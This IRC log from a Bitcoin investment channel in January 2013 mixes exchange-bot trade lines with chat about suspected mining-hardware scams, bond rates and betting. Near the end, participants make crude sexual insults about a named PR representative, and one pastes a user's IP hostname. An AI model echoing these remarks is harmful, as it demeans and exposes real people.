although.. even if bfl was a long con.. by now ppl have probably stopped putting money in I would think Jan 13 05:54:30 showing up with a box of fans and nothing at a convention.. at least it shows they are not just taking and runing and afraid of saying 'i havenothing to show at the moment' and scaring off possible investors Jan 13 05:54:38 from one point of view Jan 13 05:54:57 pirate went to vegas Jan 13 05:54:57 haha some fun bets on bitbet just poped Jan 13 05:55:03 there's an exhibitionist angle in most scammers. Jan 13 05:55:15 hmm that is true Jan 13 05:55:28 in fact, i think the girl's june date is just about like she said september about pirate at the outer edge Jan 13 05:55:57 [MPEX] [S.DICE] 3318 @ 0.00462102 = 15.3325 BTC [+] Jan 13 05:55:58 [MPEX] [S.DICE] 888 @ 0.00462103 = 4.1035 BTC [+] Jan 13 05:56:00 [MPEX] [S.DICE] 1850 @ 0.00462556 = 8.5573 BTC [+] Jan 13 05:56:01 [MPEX] [S.DICE] 2950 @ 0.00462874 = 13.6548 BTC [+] Jan 13 05:56:02 [MPEX] [S.DICE] 700 @ 0.00463215 = 3.2425 BTC [+] Jan 13 05:56:04 [MPEX] [S.DICE] 1550 @ 0.00463678 = 7.187 BTC [+] Jan 13 05:56:05 [MPEX] [S.DICE] 1276 @ 0.0046371 = 5.9169 BTC [+] Jan 13 05:56:06 [MPEX] [S.DICE] 2900 @ 0.0046373 = 13.4482 BTC [+] Jan 13 05:56:07 [MPEX] [S.DICE] 3400 @ 0.00464814 = 15.8037 BTC [+] Jan 13 05:56:07 [MPEX] [S.DICE] 300 @ 0.00465244 = 1.3957 BTC [+] Jan 13 05:56:08 [MPEX] [S.DICE] 1450 @ 0.00465486 = 6.7495 BTC [+] Jan 13 05:56:10 [MPEX] [S.DICE] 650 @ 0.00466218 = 3.0304 BTC [+] Jan 13 05:56:11 [MPEX] [S.DICE] 1250 @ 0.00466792 = 5.8349 BTC [+] Jan 13 05:56:12 [MPEX] [S.DICE] 950 @ 0.00466833 = 4.4349 BTC [+] Jan 13 05:56:13 [MPEX] [S.DICE] 1450 @ 0.00467187 = 6.7742 BTC [+] Jan 13 05:56:14 [MPEX] [S.DICE] 1000 @ 0.00467874 = 4.6787 BTC [+] Jan 13 05:56:15 [MPEX] [S.DICE] 348 @ 0.00468482 = 1.6303 BTC [+] Jan 13 05:56:16 [MPEX] [S.DICE] 300 @ 0.00468761 = 1.4063 BTC [+] Jan 13 05:56:17 [MPEX] [S.DICE] 650 @ 0.00469235 = 3.05 BTC [+] Jan 13 05:56:17 [MPEX] [S.DICE] 550 @ 0.00469341 = 2.5814 BTC [+] Jan 13 05:56:19 [MPEX] [S.DICE] 1750 @ 0.00470507 = 8.2339 BTC [+] Jan 13 05:56:20 [MPEX] [S.DICE] 1144 @ 0.00470807 = 5.386 BTC [+] Jan 13 05:56:21 [MPEX] [S.DICE] 400 @ 0.00471703 = 1.8868 BTC [+] Jan 13 05:56:22 [MPEX] [S.DICE] 1250 @ 0.00472245 = 5.9031 BTC [+] Jan 13 05:56:23 [MPEX] [S.DICE] 1300 @ 0.00472495 = 6.1424 BTC [+] Jan 13 05:56:24 [MPEX] [S.DICE] 1700 @ 0.00472684 = 8.0356 BTC [+] Jan 13 05:56:25 [MPEX] [S.DICE] 1220 @ 0.00472805 = 5.7682 BTC [+] Jan 13 05:56:26 [MPEX] [S.DICE] 919 @ 0.00472828 = 4.3453 BTC [+] Jan 13 05:59:25 ROLL TIDE Jan 13 06:00:21 people need to learn to fund the fucking proposal Jan 13 06:00:28 otherwise whats the point Jan 13 06:01:38 !ticker s.dice Jan 13 06:01:39 Provide exchange and ticker. Jan 13 06:01:44 !ticker m s.dice Jan 13 06:01:46 [MPEX:S.DICE] 1D: 0.00452444 / 0.00459854 / 0.00472828 (192194 shares, 883.81 BTC), 7D: 0.00430002 / 0.00467394 / 0.0048 (1909355 shares, 8,924.22 BTC), 30D: 0.0014 / 0.00350031 / 0.0048 (14545216 shares, 50,912.81 BTC) Jan 13 06:02:14 Bugpowder to fund wha ? Jan 13 06:03:06 "some fun bets on bitbet just poped" Jan 13 06:03:10 like Jan 13 06:03:14 come on dude Jan 13 06:03:17 dudes Jan 13 06:03:27 If you have a sharp time decay Jan 13 06:03:31 and want to make money Jan 13 06:03:42 put 5 down on both sides and collect bank Jan 13 06:03:44 jeeze Jan 13 06:04:10 at least for these microbets Jan 13 06:04:19 that are pure chance Jan 13 06:04:39 I guess I could do it myself Jan 13 06:05:12 !ticker m s.bbet Jan 13 06:05:13 [MPEX:S.BBET] 1D: 0.002 / 0.002 / 0.002 (2148 shares, 4.30 BTC), 7D: 0.000337 / 0.00068136 / 0.0035 (1993241 shares, 1,358.13 BTC), 30D: 0.000337 / 0.00068136 / 0.0035 (1993241 shares, 1,358.13 BTC) Jan 13 06:05:28 i guess for many peoples it's an income thing, propose a bet, get it accepted, make some .btc Jan 13 06:05:53 how much do you make by doing that? Jan 13 06:06:11 well on average about .05 Jan 13 06:08:37 ;;ticker Jan 13 06:08:38 BTCUSD ticker | Best bid: 14.17001, Best ask: 14.19000, Bid-ask spread: 0.01999, Last trade: 14.17001, 24 hour volume: 24989.69632575, 24 hour low: 13.97500, 24 hour high: 14.33800, 24 hour vwap: 14.16527 Jan 13 06:12:53 [MPEX] [S.DICE] 600 @ 0.00469469 = 2.8168 BTC [-] Jan 13 06:23:41 Kluge cant afford a can of air. Jan 13 06:23:45 [MPEX] [S.DICE] 500 @ 0.00452444 = 2.2622 BTC [-] Jan 13 06:24:24 sorry ? Jan 13 06:24:33 https://bitcointalk.org/index.php?topic=136204.msg1450835;topicseen#msg1450835 Jan 13 06:24:38 > Can't afford a new can of air. Jan 13 06:24:59 gotta be some expencive shit i guess Jan 13 06:25:11 heh Jan 13 06:25:14 so basic blew up? Jan 13 06:25:21 kakobrekla: heh, ever since that new federal law, yes it is Jan 13 06:25:24 the anti-huffing law Jan 13 06:25:29 lol Jan 13 06:25:33 (even though you cant huff canned air) Jan 13 06:25:52 I used to get a six pack of canned air for 12 dollars Jan 13 06:25:56 now its 3 for 12 Jan 13 06:26:16 it it at least clean? Jan 13 06:26:29 [MPEX] [S.DICE] 2150 @ 0.00452444 = 9.7275 BTC [-] Jan 13 06:26:33 Diablo-D3 yes. big time Jan 13 06:26:33 I quit buying canned air, I use an air compressor now Jan 13 06:26:56 [MPEX] [S.DICE] 1212 @ 0.00452444 = 5.4836 BTC [-] Jan 13 06:26:58 [MPEX] [S.DICE] 3788 @ 0.00452443 = 17.1385 BTC [-] Jan 13 06:27:32 [BTCTC] [ESECURITYSABTC] 4 @ 0.73 = 2.92 BTC [+] Jan 13 06:27:46 i prefer canned screams Jan 13 06:27:53 adds vibration effect. Jan 13 06:28:51 okay so Jan 13 06:28:52 if basic is out Jan 13 06:28:55 and bfl is a scam Jan 13 06:29:07 and avalon wont be shipping until late feb Jan 13 06:29:14 asicminer wins by default? Jan 13 06:29:20 sounds like it Jan 13 06:29:20 if they mine. Jan 13 06:29:36 so far we have a list of 4-5 scams of which one blew and the motherlode is blowing Jan 13 06:29:41 asic miner will make lots of coin prolly Jan 13 06:29:46 most possibly Jan 13 06:29:50 of them asics Jan 13 06:29:56 but there are 2 more players Jan 13 06:30:05 not taking preorders Jan 13 06:30:19 I have seen no evidence that asicminer has working asices Jan 13 06:31:08 they had some pix of a mishandled chip strip Jan 13 06:31:26 I saw that Jan 13 06:31:39 and some text in a forum post Jan 13 06:31:51 well, they were supposed to be ready in a week 10 days ago Jan 13 06:32:05 and i guess the sending prototypes to community was silently dropped Jan 13 06:32:06 so... Jan 13 06:32:09 ;;bc,stats Jan 13 06:32:11 who knows at this point. Jan 13 06:32:11 Current Blocks: 216319 | Current Difficulty: 3249549.5844872 | Next Difficulty At Block: 217727 | Next Difficulty In: 1408 blocks | Next Difficulty In About: 1 week, 3 days, 23 hours, 36 minutes, and 32 seconds | Next Difficulty Estimate: 2896792.17443539 | Estimated Percent Change: -10.8555786234 Jan 13 06:32:16 lol Jan 13 06:32:33 [BTCTC] [COGNITIVE] 1 @ 0.476 BTC [+] Jan 13 06:33:09 at this rate I might actually take the time to claim my gigamining shares Jan 13 06:33:53 Hi all! Jan 13 06:33:53 Coinster.info is a new search engine, the world's first specifically for crypto-currencies like Bitcoin. However, giving users a search engine isn't the main goal. Coinster is meant to be a connection platform, with emphasis on connecting people locally to trade goods and services. Jan 13 06:33:55 dun dun dun Jan 13 06:34:05 [BTCTC] [BTC-GOLD] 1 @ 0.0396 BTC Jan 13 06:34:22 diff droppingwowzer. Jan 13 06:34:38 search for mpex on coinster Jan 13 06:34:41 nothing Jan 13 06:34:43 :O( Jan 13 06:34:49 [BTCTC] [GSDPT] 9 @ 0.0069 = 0.0621 BTC [-] Jan 13 06:34:59 whos mpex? Jan 13 06:35:53 https://nastyfans.org/logo.jpg Jan 13 06:37:05 lol @ Bugpowder graph Jan 13 06:37:13 http://brainwindows.files.wordpress.com/2013/01/mpexschematic.jpg Jan 13 06:37:45 I tried to make it as accurate as possible Jan 13 06:39:37 [MPEX] [S.DICE] 1900 @ 0.00452443 = 8.5964 BTC [-] Jan 13 06:40:06 San Francisco with the big win Jan 13 06:40:07 well Jan 13 06:40:19 I have probably officially lost my office NFL pool. Jan 13 06:40:36 hopefully I can make up for the losses with coin wins. Jan 13 06:46:31 hehe are you ahead in bets ? Jan 13 06:49:04 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jan 13 06:49:14 [BTCTC] [COGNITIVE] 5 @ 0.476 = 2.38 BTC [+] Jan 13 06:51:14 [MPEX] [S.DICE] 300 @ 0.00452443 = 1.3573 BTC [-] Jan 13 06:54:45 [MPEX] [S.DICE] 1012 @ 0.00452443 = 4.5787 BTC [-] Jan 13 06:54:47 [MPEX] [S.DICE] 650 @ 0.00452105 = 2.9387 BTC [-] Jan 13 06:54:48 [MPEX] [S.DICE] 1693 @ 0.00451817 = 7.6493 BTC [-] Jan 13 06:56:25 [BTCTC] [LTC-MINING] 5 @ 0.44 = 2.2 BTC Jan 13 07:00:14 [BTCTC] [RSM] 44 @ 0.0068 = 0.2992 BTC [+] Jan 13 07:01:11 [MPEX] [S.DICE] 502 @ 0.00456647 = 2.2924 BTC [+] Jan 13 07:05:13 speaking of jiggamining Jan 13 07:05:31 mircea_popescu: did you ever figure out the whole PT stuff for that? Jan 13 07:05:35 or just left it as it was for now? Jan 13 07:05:51 just curious Jan 13 07:06:13 not much to figure out tbh Jan 13 07:12:39 [MPEX] [S.DICE] 598 @ 0.00458615 = 2.7425 BTC [+] Jan 13 07:13:23 its still at the not claiming point right? Jan 13 07:14:33 or did you guys work that out Jan 13 07:15:58 [BTCTC] [COGNITIVE] 1 @ 0.476 BTC [+] Jan 13 07:20:33 [BTCTC] [ESECURITYSABTC] 2 @ 0.73 = 1.46 BTC [+] Jan 13 07:21:21 still exactly where it was in like early dec or w/ee Jan 13 07:27:10 kk Jan 13 07:37:52 [MPEX] [S.DICE] 602 @ 0.00456741 = 2.7496 BTC [-] Jan 13 07:49:31 how's it goin tonight -assets? Jan 13 07:49:34 :D Jan 13 07:55:25 plenty of drama today Jan 13 07:59:14 ya, saw some. Jan 13 07:59:27 really? What drama? Jan 13 07:59:38 well Jan 13 07:59:43 aaronsw committed suicide Jan 13 08:00:20 ya that Jan 13 08:00:40 and basic is apparently a scam Jan 13 08:00:56 ahh, yah right. Jan 13 08:01:06 and.. i even saw a post on btctalk from usagi! Jan 13 08:01:16 yeah hes been posting again Jan 13 08:01:46 heh Jan 13 08:02:11 How can you be sure he has? Jan 13 08:02:50 well, whomever it was posted it with usagi's account Jan 13 08:03:17 the other thing =/ Jan 13 08:04:56 and who is he? Jan 13 08:07:18 http://tinysong.com/jjqC Jan 13 08:07:31 Also, what about basic? As for Usagi, I'm pretty unmoved. He started getting active again and paying some BTC on his stocks. That's at least some more I'll be getting back. Jan 13 08:08:05 Namworld https://www.btcfpga.com/forum/index.php?topic=1041.msg3094#new Jan 13 08:08:48 heh Jan 13 08:08:54 well, sadly, DMC's dividend was paid to him Jan 13 08:15:15 eh Jan 13 08:18:22 and bitbet past 750 Jan 13 08:20:25 and check out the action on this baby http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Jan 13 08:21:40 oh that one got some attention quick! Jan 13 08:23:08 indeed. Jan 13 08:23:48 i was just reading about the btcfpga stuff. Jan 13 08:24:55 sad huh Jan 13 08:25:24 [MPEX] [S.DICE] 1047 @ 0.00461927 = 4.8364 BTC [+] Jan 13 08:25:58 ya.. i was wonderin if it would go the same as BFL Jan 13 08:28:35 [BTCTC] [BASIC-MINING] 15 @ 0.3206 = 4.809 BTC [-] Jan 13 08:28:37 [BTCTC] [BASIC-MINING] 15 @ 0.3205 = 4.8075 BTC [-] Jan 13 08:28:39 [BTCTC] [BASIC-MINING] 35 @ 0.3204 = 11.214 BTC [-] Jan 13 08:28:40 [BTCTC] [BASIC-MINING] 35 @ 0.3202 = 11.207 BTC [-] Jan 13 08:28:48 LOL Jan 13 08:28:51 DOWN IT GOES Jan 13 08:29:09 ya, there you have it i guess. Jan 13 08:29:32 its going down harder than... YOUR MOM. Jan 13 08:29:33 o ity's actually listed ?! Jan 13 08:29:42 !ticker b basic Jan 13 08:29:43 Yeah. No damn tobacco, that's for sure. Jan 13 08:29:45 !ticker b basic-mining Jan 13 08:29:46 I cooked, I cleaned, and I sewed, and I have a right to get-- Jan 13 08:29:51 !ticker btctc basic-mining Jan 13 08:29:54 haha Jan 13 08:29:56 [BTCT:BASIC-MINING] 1D: 0.3202 / 0.3218 / 0.33 (117 shares, 37.6 BTC), 7D: 0.3105 / 0.33 / 0.33 (379 shares, 123.8 BTC), 30D: 0.3105 / 0.33 / 0.33 (1163 shares, 382.4 BTC) Jan 13 08:30:11 is this actually btcfpga stock ?! Jan 13 08:30:15 oh wow Jan 13 08:30:15 400 btc volume in a month ?! Jan 13 08:31:31 when is bitvps gonna get their shit together Jan 13 08:32:01 !ticker m S.BVPS Jan 13 08:32:03 [MPEX:S.BVPS] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0.00200003 / 0.0033336 / 0.0067 (13238 shares, 44.13 BTC) Jan 13 08:32:05 mircea_popescu: preorder shit Jan 13 08:32:10 Namworld says he's gonna do it. Jan 13 08:32:14 do what Jan 13 08:32:28 that was to thestringpuller's q Jan 13 08:32:35 run bitvps Jan 13 08:33:31 and they have colored monthly statements going forward. Jan 13 08:33:46 so that helps Jan 13 08:34:23 [MPEX] [S.DICE] 850 @ 0.00470763 = 4.0015 BTC [+] Jan 13 08:35:38 and iirc there are still >100 active vps' Jan 13 08:38:48 [MPEX] [S.BBET] 3000 @ 0.002 = 6 BTC [+] Jan 13 08:39:02 mod6 lets talk Jan 13 08:42:18 whoa nelly Jan 13 08:42:30 ;;calc 253.84 / 254.98 Jan 13 08:42:30 0.995529061103 Jan 13 08:42:36 tightest odds you've ever seen Jan 13 08:43:45 yeah, it really narrowed quick after that stock dump lol Jan 13 08:44:24 253 to 254? Jan 13 08:45:17 icbit.se will shutdown lol Jan 13 08:45:37 ;;bc,diff Jan 13 08:45:38 3249549.5844872 Jan 13 08:46:50 Network Difficulty under 20 million for 2 months...isn't that like a futures? Jan 13 08:47:30 Indeed. But that goes with expenses. Seems like we'll have a lot of expenses in the following months. Jan 13 08:50:47 Monte Carlo Method vs. Black-Scholes Model Jan 13 08:50:52 thestringpuller sort of like a future syeah Jan 13 08:51:06 mod6 what stock dump ? Jan 13 08:51:14 bfl isn;t listed anywhere is it ? Jan 13 08:52:38 oh no. my bad. Jan 13 08:52:51 sorry, got cornfused. Jan 13 09:00:39 [MPEX] [S.MPOE] 7700 @ 0.0006458 = 4.9727 BTC [-] Jan 13 09:01:40 mpoe is gonna crasssssh when Smickles launches his bot Jan 13 09:06:52 hmm Jan 13 09:07:01 i kid I kid Jan 13 09:17:21 [MPEX] [S.DICE] 641 @ 0.00470763 = 3.0176 BTC [+] Jan 13 09:25:57 ok sweet. darn you 'nobootwait' flag! Jan 13 09:27:14 [BTCTC] [GSDPT] 1 @ 0.0069 BTC [-] Jan 13 09:28:10 [BTCTC] [GSDPT] 1 @ 0.007 BTC [+] Jan 13 09:30:47 ok nice, now i've got my new vols attached finally. Jan 13 09:30:48 /dev/xvdf 197G 188M 187G 1% /mnt/extVol Jan 13 09:31:14 kinda new to this AWS stuff Jan 13 09:32:43 :D Jan 13 09:32:50 time for a lunch break Jan 13 09:46:47 [MPEX] [S.DICE] 859 @ 0.00462544 = 3.9733 BTC [-] Jan 13 09:49:20 [MPEX] [S.DICE] 1400 @ 0.00463298 = 6.4862 BTC [+] Jan 13 09:49:22 [MPEX] [S.DICE] 73 @ 0.00464434 = 0.339 BTC [+] Jan 13 10:21:31 *hanbot* hallo Jan 13 10:22:29 ;;ticker Jan 13 10:22:30 BTCUSD ticker | Best bid: 14.20001, Best ask: 14.26321, Bid-ask spread: 0.06320, Last trade: 14.20001, 24 hour volume: 17059.92244125, 24 hour low: 13.97500, 24 hour high: 14.31173, 24 hour vwap: 14.13523 Jan 13 10:24:51 [MPEX] [S.DICE] 400 @ 0.00462763 = 1.8511 BTC [-] Jan 13 10:38:33 [MPEX] [S.MPOE] 670 @ 0.00063814 = 0.4276 BTC [-] Jan 13 10:38:35 [MPEX] [S.MPOE] 700 @ 0.000631 = 0.4417 BTC [-] Jan 13 10:38:36 [MPEX] [S.MPOE] 7343 @ 0.00063 = 4.6261 BTC [-] Jan 13 10:58:00 [MPEX] [S.DICE] 327 @ 0.00464434 = 1.5187 BTC [+] Jan 13 11:09:35 [BTCTC] [ESECURITYSABTC] 1 @ 0.72 BTC [-] Jan 13 11:10:19 [BTCTC] [ESECURITYSABTC] 1 @ 0.7 BTC [-] Jan 13 11:11:20 [BTCTC] [BTC-BOND] 479 @ 0.01 = 4.79 BTC [+] Jan 13 11:11:22 [BTCTC] [BTC-BOND] 21 @ 0.01 = 0.21 BTC [+] Jan 13 11:17:48 [MPEX] [S.DICE] 200 @ 0.00472828 = 0.9457 BTC [+] Jan 13 11:19:35 BTC-BOND, always a nice choice Jan 13 11:20:15 Figured it's the safest one - 0.03% no matter what and you're plausible Jan 13 11:20:21 Jan 13 11:20:48 Unlike the guy from ESECURITYSABTC - 1.3% a week ontop of being afiliated with a company that hosts HYIP scams for a living Jan 13 11:21:30 It's not ridiculous if he funds servers with the funds... but I don't see why anyone would borrow at that rate. Jan 13 11:22:19 With you... 10% a year, a borrower can live with that and it's above inflation for me, but 70%?! Jan 13 11:24:09 Well the server will save you a lot in monthly rent of server. Jan 13 11:24:49 Usually will save you more than the server cost within a year. Jan 13 11:25:04 But again, still very high... why would anyone borrow at those rates? Jan 13 11:25:26 If they can borrow for much cheaper... Jan 13 11:25:30 Just a lost of profits. Jan 13 11:25:51 I emailed him, he replies from admin@koddos.com, company exists and operates, but those rates... Jan 13 11:26:21 It's the main reason I haven't invested anything significant in him yet Jan 13 11:31:48 [MPEX] [S.DICE] 873 @ 0.00467921 = 4.085 BTC [-] Jan 13 11:34:45 [MPEX] [S.DICE] 243 @ 0.00467684 = 1.1365 BTC [-] Jan 13 11:34:47 [MPEX] [S.DICE] 57 @ 0.00472828 = 0.2695 BTC [+] Jan 13 11:45:55 Cofounder of reddit commited suicide Jan 13 11:46:07 yup. Jan 13 11:46:16 And I'm trying to get to the bottom of the ESECURITYSABTC bond Jan 13 11:46:50 If it proves to be legit, there are enough bonds left to invest, if not, it'll be hopefully gone Jan 13 11:49:03 [MPEX] [S.DICE] 508 @ 0.00472828 = 2.402 BTC [+] Jan 13 11:49:05 [MPEX] [S.DICE] 342 @ 0.00472867 = 1.6172 BTC [+] Jan 13 11:51:39 MPEX itself isn't that bad, its PR-chick is terrible at PR tho Jan 13 11:53:29 agreed Jan 13 11:54:09 I mean MPEX is great for some corporate guy or banker to get into BTC, because that kind of setup is familiar to him Jan 13 11:57:13 [MPEX] [S.DICE] 650 @ 0.00464027 = 3.0162 BTC [-] Jan 13 12:00:15 [MPEX] [S.DICE] 100 @ 0.00464027 = 0.464 BTC [-] Jan 13 12:00:17 [MPEX] [S.DICE] 1250 @ 0.0046402 = 5.8003 BTC [-] Jan 13 12:04:11 [MPEX] [S.DICE] 358 @ 0.00472867 = 1.6929 BTC [+] Jan 13 12:04:13 [MPEX] [S.DICE] 592 @ 0.00472883 = 2.7995 BTC [+] Jan 13 12:37:23 [MPEX] [S.DICE] 779 @ 0.0046402 = 3.6147 BTC [-] Jan 13 12:37:26 [BTCTC] [GSDPT] 78 @ 0.007 = 0.546 BTC [+] Jan 13 12:46:19 Current weight: 78`758 ( from 100`000 to 90`000 ) <-- how can that be kakobrekla ? Jan 13 12:50:15 now that's an excellent question Jan 13 12:54:35 I guess it's a bug Jan 13 12:56:50 OOI whatever happened to the glbse prediction market? Jan 13 12:57:10 FabianB_ looks that way. got top of the list placing. Jan 13 12:57:15 markedathome whassat ? Jan 13 12:58:29 https://bitcointalk.org/index.php?topic=77859.0 Jan 13 13:03:02 i guess nothing. Jan 13 13:03:57 The problem with prediction markets is the market maker. If it is automated like the one that is on the GLBSE prediction market now then it will eventually lose money. That model is only used by places that don't use real money. Jan 13 13:04:01 maybe stochastic has a point. **** BEGIN LOGGING AT Sun Jan 13 22:24:07 2013 Jan 13 22:29:31 [MPEX] [S.DICE] 184 @ 0.00474447 = 0.873 BTC [+] Jan 13 22:29:32 [MPEX] [S.DICE] 748 @ 0.00474535 = 3.5495 BTC [+] Jan 13 22:32:36 thestringpuller It's not over yet... Jan 13 22:35:01 wassup Jan 13 22:36:04 seattle coming back Jan 13 22:36:29 was 20-0 Jan 13 22:36:34 now 27-21 Jan 13 22:37:19 eee Jan 13 22:37:38 pirateat40 showed up Jan 13 22:37:42 did not ident Jan 13 22:43:35 lol Jan 13 22:47:18 yes, pirate...maybe it's that time of year again Jan 13 22:49:34 someone should start a poll "Who do we hate more, Inaba or MPOE-PR" Jan 13 22:52:36 i think that pirateat40 had the same ip/isp as someone who just joined Jan 13 22:53:38 Schadenfredu Jan 13 22:53:41 yeah similar Jan 13 22:53:46 I don't have a log though Jan 13 22:58:07 Bugpowder, who has posession? Jan 13 22:58:46 mircea_popescu: is a grumpy old man who yells at kids to get off his yard Jan 13 22:59:07 17:54 -!- pirateat40 [~m@178.115.249.183.wireless.dyn.drei.com] has joined #bitcoin-assets Jan 13 22:59:10 17:55 -!- Schadenfreude [~m@178.115.249.183.wireless.dyn.drei.com] has quit [Quit: Leaving] Jan 13 22:59:13 17:56 < pirateat40> sup guise, anyone up for a lucrative investment? Jan 13 22:59:24 FabianB it's a troll. Jan 13 22:59:34 i know Jan 13 22:59:56 a troll of Schadenfreude Jan 13 23:00:52 lol Jan 13 23:02:12 mircea_popescu: why have you not gotten into currency exchange? Jan 13 23:02:31 same reason i haven't gotten into mining Jan 13 23:02:37 no competitive advantage. Jan 13 23:05:32 maybe only if the RON were internationally widely used currency Jan 13 23:05:55 the ron actually is pretty strong, as far as eu currencies go. Jan 13 23:06:19 it isn't however the policy of the nbr to make it an intl reserve at all, and we're friends so, i wouldn't expose it in btc trade. Jan 13 23:06:48 [MPEX] [S.BBET] 125 @ 0.002 = 0.25 BTC [+] Jan 13 23:07:19 it's probably not hard for romanians to send RON converted to EUR to one of the EUR exchanges, is it? Jan 13 23:07:25 not at all. Jan 13 23:07:34 [MPEX] [S.BVPS] 40 @ 0.00635541 = 0.2542 BTC [+] Jan 13 23:07:35 so no need for a RON ex Jan 13 23:07:44 not from that angle. Jan 13 23:07:51 the us/eu people have however a need to buy ron Jan 13 23:08:13 [MPEX] [S.MPOE] 40 @ 0.00063268 = 0.0253 BTC [+] Jan 13 23:08:21 it's a tiny currency backed by a lot of gold and the world's best (currenly) nat'l bank governor. Jan 13 23:08:40 [MPEX] [S.DICE] 52 @ 0.00472283 = 0.2456 BTC [-] Jan 13 23:09:20 i buy btc instead Jan 13 23:09:33 also works. Jan 13 23:09:36 but probably interesting if eur/us want to do business in romania Jan 13 23:09:49 interesting if eur/us wants money the eur/us can't steal Jan 13 23:09:52 o i mean "freeze" Jan 13 23:11:05 romania never considered the euro? Jan 13 23:11:17 it did. and rejected it. Jan 13 23:11:39 why does mining have no competitive advantage? Jan 13 23:11:49 [MPEX] [S.MPOE] 355 @ 0.00063268 = 0.2246 BTC [+] Jan 13 23:13:43 were you asking me why mining doesn't happen or why i don;t do it ? Jan 13 23:16:43 [MPEX] [S.DICE] 898 @ 0.00472283 = 4.2411 BTC [-] Jan 13 23:16:45 [MPEX] [S.DICE] 352 @ 0.00474535 = 1.6704 BTC [+] Jan 13 23:18:58 jurov what did you pick in the end ? from mpoe-pr Jan 13 23:18:59 falcons win Jan 13 23:19:43 mircea_popescu: you said it has no competitive advantage could you elaborate? Jan 13 23:19:56 i said I have no competitive advantage. Jan 13 23:20:14 wherefore? Jan 13 23:20:33 mircea_popescu, something like this: https://bitcointalk.org/index.php?topic=135552.msg1445540#msg1445540 Jan 13 23:20:56 lol not bad. Jan 13 23:21:13 but there's enough time, maybe she can make a little effort in meantime Jan 13 23:21:26 o hey, you're going Jan 13 23:21:33 send taaki our heartfeld compliments Jan 13 23:21:51 there are two taakis presenting Jan 13 23:22:23 and i'm looking into something more succinct Jan 13 23:22:33 *into->for Jan 13 23:22:38 Omnia In Numeris Jan 13 23:23:10 jurov just ftr, MPEx doesn't care if you buldgeon people into a pulp. Jan 13 23:25:44 youd seriousy go -pr over inaba? Jan 13 23:26:58 someone should arrange a cagefight match. or mudfight. with full bitbet coverage. Jan 13 23:28:10 http://www.thebitcointrader.com/2013/01/253-btc-3577-usd-bet-that-butterfly.html Jan 13 23:28:13 the beauty of old news :D Jan 13 23:28:27 do people actually hate inaba? Jan 13 23:32:39 another contender: https://bitcointalk.org/index.php?topic=120119.msg1430599#msg1430599 Jan 13 23:33:12 I dont really hate anyone Jan 13 23:33:12 Im just confused at why they did what they did Jan 13 23:33:12 is it mental illness? Jan 13 23:33:35 he's an idiot Jan 13 23:33:50 [MPEX] [S.DICE] 100 @ 0.00474535 = 0.4745 BTC [+] Jan 13 23:33:52 [MPEX] [S.DICE] 1200 @ 0.00474591 = 5.6951 BTC [+] Jan 13 23:34:29 yeah, but why intentionally give up so much money? Jan 13 23:34:33 same goes with nefario and the rest Jan 13 23:34:46 because idiot Jan 13 23:37:24 so fast http://i.imgur.com/fcma3.jpg Jan 13 23:37:27 also invisilbe Jan 13 23:37:31 ble Jan 13 23:38:08 in other news, i was being asked wrt usign coinbr to do mpex passthroughs on ltcglobal Jan 13 23:38:16 "starting off with 5 BTC worth of each" Jan 13 23:38:42 i was being all polite and professional... but 5BTC, orly? Jan 13 23:39:14 thats like trillions of ltc tho rite? Jan 13 23:40:04 jurov 5btc is a lot of ltc Jan 13 23:40:06 plus, for it to be set up properly, they have to vote about it Jan 13 23:40:08 o wait dub got there first Jan 13 23:40:20 which one? Jan 13 23:40:35 EskimoBob: what is your deal with being an uninformed troll? Jan 13 23:40:42 ^ Jan 13 23:41:02 its a disgrace to trolling Jan 13 23:41:26 EskimoBob: you are a heckler Jan 13 23:41:31 you like to heckle mpex Jan 13 23:41:32 lol Jan 13 23:42:42 anyway my deal with mpex is implementing frontend to functions that mpex later deprecates Jan 13 23:42:49 first STAT, then WITHDRAW Jan 13 23:42:49 dun dun dun Jan 13 23:42:50 ;;google heckler Jan 13 23:42:50 Heckler - Wikipedia, the free encyclopedia: ; Heckler (2007) - IMDb: ; Heckler | We Bring Nothing To The Table: Jan 13 23:42:59 stat isn't deprecated! Jan 13 23:43:04 and judging from today's unhappenings, DEPOSIT is next Jan 13 23:43:11 lol wtf. Jan 13 23:43:21 Lol wtf Jan 13 23:43:21 this is a trollspiracy! Jan 13 23:44:16 EskimoBob: have a look at https://coinbr.com/about Jan 13 23:44:34 at least stat was superseded with statjson, to give some credit Jan 13 23:44:49 EskimoBob: Did MPOE-PR piss you off so much that you want to go to thermonuclear war with MPEX? Jan 13 23:45:15 it seems all you deep seeded hatred for MPEX is due to MPOE-PR Jan 13 23:45:31 dont let your jimmies get rustled Jan 13 23:45:46 [MPEX] [S.DICE] 265 @ 0.00474591 = 1.2577 BTC [+] Jan 13 23:45:48 [MPEX] [S.DICE] 600 @ 0.00474912 = 2.8495 BTC [+] Jan 13 23:45:49 [MPEX] [S.DICE] 2000 @ 0.00474965 = 9.4993 BTC [+] Jan 13 23:45:50 [MPEX] [S.DICE] 149 @ 0.00474969 = 0.7077 BTC [+] Jan 13 23:46:14 man, Ill pay her 1.1 a day to quit mpoe-pr and do dmc-pr Jan 13 23:46:30 deep seeded? Jan 13 23:46:50 sounds like a pr0n Jan 13 23:47:06 btw, itym deep seated Jan 13 23:47:19 EskimoBob: and afaik shes fucking the boss anyhow Jan 13 23:47:52 she gets paid while she's getting paid Jan 13 23:47:58 man, Ill pay her 1.1 a day to quit mpoe-pr and do dmc-pr << now that's nice. Jan 13 23:48:26 EskimoBob: "the human dildo" Jan 13 23:49:27 [MPEX] [S.DICE] 1315 @ 0.00474969 = 6.2458 BTC [+] Jan 13 23:49:28 [MPEX] [S.DICE] 501 @ 0.00475053 = 2.38 BTC [+] Jan 13 23:49:29 [MPEX] [S.DICE] 1521 @ 0.00475127 = 7.2267 BTC [+] Jan 13 23:49:48 ROTA vs. The Human Dildo Jan 13 23:50:52 Human Dildo II: Deep seeding Jan 13 23:51:31 there was edward penis hands Jan 13 23:51:39 eskimo, srs. can't you fap outside this channel? Jan 13 23:51:47 we're tired of wiping that shit Jan 13 23:52:14 step 1) produce logs Jan 13 23:52:18 step 2) wipe Jan 13 23:52:23 step 3) flush Jan 13 23:52:48 unix coders are lol. Jan 13 23:55:05 LOL Jan 13 23:55:07 This site is currently in beta. Nothing is verified. Everything is virtual. Do your homework. Watch out for scams. 